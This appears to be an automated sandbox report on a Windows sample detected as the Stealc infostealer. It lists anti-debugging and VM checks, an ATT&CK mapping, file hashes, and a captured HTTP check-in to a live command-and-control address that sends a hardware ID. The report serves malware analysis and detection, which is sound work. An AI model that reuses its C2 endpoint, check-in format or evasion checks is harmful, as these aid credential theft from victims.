              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008E16A0
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_008E16B9
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008FD720 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008FD720
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008FDF20 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_008FDF20
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00901DC0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,1_2_00901DC0
              Source: file.exe, file.exe, 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: iMSHN6QKQEMUh;=a
              Source: file.exe, file.exe, 00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: MSHN6QKQEMU
              Source: file.exe, 00000001.00000002.2277505797.0000000001324000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
              Source: file.exe, 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
              Source: file.exe, 00000001.00000002.2277505797.0000000001356000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: file.exe, 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_1-27371)
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_1-27363)
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_1-27215)
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_1-27234)
              Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
              Source: C:\Users\user\Desktop\file.exe | File opened: SICE
              Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
              Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008E4A60 VirtualProtect 00000000,00000004,00000100,? 1_2_008E4A60
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_009068F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_009068F0
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_009065A0 mov eax, dword ptr fs:[00000030h] 1_2_009065A0
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00902910 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,1_2_00902910
              Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: Process Memory Space: file.exe PID: 7028, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_009048B0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_009048B0
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00904820 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_00904820
              Source: file.exe, file.exe, 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: S#LProgram Manager
              Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00902F30
              Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00904040 lstrcpy,lstrcpy,GetSystemTime,1_2_00904040
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00902C10 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00902C10
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00902DE0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00902DE0

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: file.exe PID: 7028, type: MEMORYSTR
              Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

              Source: Yara match | File source: 00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: file.exe PID: 7028, type: MEMORYSTR
              Source: Yara match | File source: dump.pcap, type: PCAP
              MITRE ATT&CK Matrix (techniques listed per tactic; numeric prefixes are reproduced as shown in the report)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: 2 Command and Scripting Interpreter; 13 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
              Persistence: 1 Create Account; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Defense Evasion: 1 Masquerading; 43 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: 2 System Time Discovery; 741 Security Software Discovery; 43 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
              Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
              Antivirus detection (submitted sample)
              Source | Detection | Scanner | Label | Link
              file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
              file.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches (dropped files, unpacked PE files, domains)

              Antivirus detection (URLs)
              Source | Detection | Scanner | Label | Link
              http://185.215.113.206/c4becf79229cb002.php6/E | 100% | Avira URL Cloud | malware |
              http://185.215.113.206/c4becf79229cb002.php2.Y | 100% | Avira URL Cloud | malware |
              http://185.215.113.206/c4becf79229cb002.phpR. | 100% | Avira URL Cloud | malware |

              No contacted domains info

              Contacted URLs
              Name | Malicious | Antivirus Detection | Reputation
              http://185.215.113.206/c4becf79229cb002.php | false | | high
              http://185.215.113.206/ | false | | high

              URLs from memory and binary strings
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://185.215.113.206/c4becf79229cb002.php6/E | file.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
              http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://185.215.113.206/c4becf79229cb002.php2.Y | file.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
              http://185.215.113.206/c4becf79229cb002.phpR. | file.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
              http://185.215.113.206 | file.exe, 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://185.215.113.206/: | file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://185.215.113.206/9 | file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmp | false | | high

              Contacted IPs
              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
              185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1565981
                          Start date and time:2024-12-01 03:31:12 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 42s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 78%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 124
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, HTMLPhisher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Cryptbot | 185.215.113.43
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, HTMLPhisher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
                          No context
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.946292204035531
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'785'856 bytes
                          MD5:a8d083b25843d8b182146793d9665ac5
                          SHA1:7d64723ba2c0fa76e3f1126d3583331364e8815e
                          SHA256:4597e4ff598b3353854bce87b300cc65cab353aad474b32fb2768b6931983973
                          SHA512:9503ec6a8959f4619108c21abf8911a721474ac486146be44362f9ceeccc5cc8a2c751546aa28215c5a0683f3785548e8ba038b74cf8fb56f8b2953afec0cd40
                          SSDEEP:49152:FJBBIrjohooe3Qt4W8IexdFJeqJSpSmzm:jBBIrjOorgVe5Sp2
                          TLSH:86853331F2721FAEE89CA2F824BB53027274D1A205D392ED77907E5E6D6131BD865833
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........PE..L...<.Jg...........
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0xa8d000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x674AE73C [Sat Nov 30 10:21:48 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007FA1D8B16FEAh
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x249000 | 0x16200 | fdf3e8600cf69379950b7b74cd7020e8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x1f0 | 0x200 | 9536d2b3a2eda870e2407104c9596139 | False | 0.576171875 | data | 5.048164681214948 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x2a5000 | 0x200 | 10240a7fcb41086139206364ed131c18 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yktwzmco | 0x4f1000 | 0x19b000 | 0x19a200 | 58b6bd77edf5dbbb483d237bcd0b5470 | False | 0.9947829358427309 | data | 7.954359902846811 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jxtdziyw | 0x68c000 | 0x1000 | 0x400 | df5242f0eea27f8f28fe45f45a47a29d | False | 0.8271484375 | data | 6.368137940541943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68d000 | 0x3000 | 0x2200 | b35facca0a08b8783985a2cda6453aba | False | 0.07157628676470588 | DOS executable (COM) | 0.8576478901385488 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x24a058 | 0x198 | ASCII text, with CRLF line terminators | | | 0.5833333333333334
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-01T03:32:19.481696+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49720 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 1, 2024 03:32:17.226110935 CET | 49720 | 80 | 192.168.2.6 | 185.215.113.206
Dec 1, 2024 03:32:17.346149921 CET | 80 | 49720 | 185.215.113.206 | 192.168.2.6
Dec 1, 2024 03:32:17.346313953 CET | 49720 | 80 | 192.168.2.6 | 185.215.113.206
Dec 1, 2024 03:32:17.347270966 CET | 49720 | 80 | 192.168.2.6 | 185.215.113.206
Dec 1, 2024 03:32:17.467123985 CET | 80 | 49720 | 185.215.113.206 | 192.168.2.6
Dec 1, 2024 03:32:18.724034071 CET | 80 | 49720 | 185.215.113.206 | 192.168.2.6
Dec 1, 2024 03:32:18.725709915 CET | 49720 | 80 | 192.168.2.6 | 185.215.113.206
Dec 1, 2024 03:32:19.030740976 CET | 49720 | 80 | 192.168.2.6 | 185.215.113.206
Dec 1, 2024 03:32:19.150787115 CET | 80 | 49720 | 185.215.113.206 | 192.168.2.6
Dec 1, 2024 03:32:19.481605053 CET | 80 | 49720 | 185.215.113.206 | 192.168.2.6
Dec 1, 2024 03:32:19.481695890 CET | 49720 | 80 | 192.168.2.6 | 185.215.113.206
Dec 1, 2024 03:32:24.177006006 CET | 49720 | 80 | 192.168.2.6 | 185.215.113.206
                          • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49720 | 185.215.113.206 | 80 | 7028 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Dec 1, 2024 03:32:17.347270966 CET | 90 | OUT | GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Dec 1, 2024 03:32:18.724034071 CET | 203 | IN | HTTP/1.1 200 OK
Date: Sun, 01 Dec 2024 02:32:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Dec 1, 2024 03:32:19.030740976 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGD
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 32 43 31 36 36 31 37 39 32 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------IDAAKEHJDHJKEBFHJEGD
Content-Disposition: form-data; name="hwid"

B2C1661792AC3343412148
------IDAAKEHJDHJKEBFHJEGD
Content-Disposition: form-data; name="build"

drum
------IDAAKEHJDHJKEBFHJEGD--
Dec 1, 2024 03:32:19.481605053 CET | 210 | IN | HTTP/1.1 200 OK
Date: Sun, 01 Dec 2024 02:32:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=



